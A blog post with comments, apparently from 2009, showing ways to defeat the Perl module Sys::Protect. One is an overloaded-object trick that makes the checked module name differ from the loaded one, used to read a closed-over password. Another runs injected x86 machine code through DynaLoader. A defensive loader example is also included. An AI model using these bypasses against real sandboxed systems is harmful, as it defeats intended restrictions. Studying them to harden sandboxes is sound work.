Breaking Sys::Protect

sartak on 2009-03-26T02:52:19

Sys::Protect does not bill itself as unbreakable protection, but it's fun to break it anyway.

PadWalker is used as an example of an XS module that could seriously mess with other code.

#!/usr/bin/env perl
no strict;
use warnings;
use Sys::Protect;
use Test::More tests => 1;

XSLoader::load(bless {}, 'Break::Sys::Protect');

my $password = 'c53eb8f992b4fdf70a03a4d437820028';
is(${PadWalker::closed_over(sub { $password })->{'$password'}}, $password);

package Break::Sys::Protect;
use overload q{""} => sub {
    return "Math::BigInt::FastCalc"
        if caller eq 'Sys::Protect';

    $_[0] = "PadWalker";
};

Don't use Sys::Protect. :)
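
The script above passes an object whose string value is "Math::BigInt::FastCalc" when Sys::Protect reads it and "PadWalker" afterwards, so the name that is checked is not the name that is loaded. As an added example (not part of the original post and not Sys::Protect's own code), one way a loader wrapper can close that gap is to reject references and load only its own validated copy. The allow-list contents and the names Shifty, checked_module_name and try_name are assumptions made for illustration.

```perl
#!/usr/bin/env perl
use strict;
use warnings;

# Hypothetical allow-list; Sys::Protect's real list is not shown on the page.
my %ALLOWED = map { $_ => 1 } qw(Math::BigInt::FastCalc List::Util);

# Return a plain, validated module name, or die.
# References (and therefore overloaded objects) are refused outright, and the
# caller must load the returned copy, never the original argument.
sub checked_module_name {
    my ($arg) = @_;
    die "module name must be a plain string\n"
        if !defined $arg || ref $arg;
    my $name = "$arg";    # stringify once and keep the result
    die "malformed module name\n"
        unless $name =~ /\A[A-Za-z_]\w*(?:::\w+)*\z/;
    die "module '$name' is not on the allow-list\n"
        unless $ALLOWED{$name};
    return $name;
}

# Constructed stand-in for the object in the post: its string value changes
# between the first and the second read.
package Shifty {
    use overload
        q{""}    => sub { $_[0]{n}++ ? 'PadWalker' : 'Math::BigInt::FastCalc' },
        fallback => 1;
}

sub try_name {
    my ($arg) = @_;
    my $name = eval { checked_module_name($arg) };
    return defined $name ? "accepted $name\n" : "rejected: $@";
}

my $obj = bless { n => 0 }, 'Shifty';

# A check-then-use sequence reads two different strings from one value.
print "check would see: $obj, load would see: $obj\n";

$obj->{n} = 0;
print try_name($obj);                        # overloaded object
print try_name('PadWalker');                 # plain string, not allow-listed
print try_name('Math::BigInt::FastCalc');    # plain string, allow-listed
```

This only addresses the checked name differing from the loaded name; it does not make an allow-list wrapper a sandbox.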


Sys::Protect is too weak :(

tokuhirom on 2009-03-26T03:06:12

Hey, a user can inject any machine code under Sys::Protect!

use strict;
use warnings;
use Sys::Protect;
use DynaLoader;

my $s = join(
    '',
    "\x31\xc0",    # xor %eax,%eax
    "\xb0\x02",    # mov $0x2,%al
    "\xcd\x80",    # int $0x80
    "\xc3",        # ret
);
DynaLoader::dl_install_xsub( 'myfork', unpack( "L", pack( "P*", $s ) ) );
&myfork;

print "\nforked?\n";

Re:Sys::Protect is too weak :(

sartak on 2009-03-26T03:18:27

Super cool. I also loved your pure-perl DB/inside-out hack. :)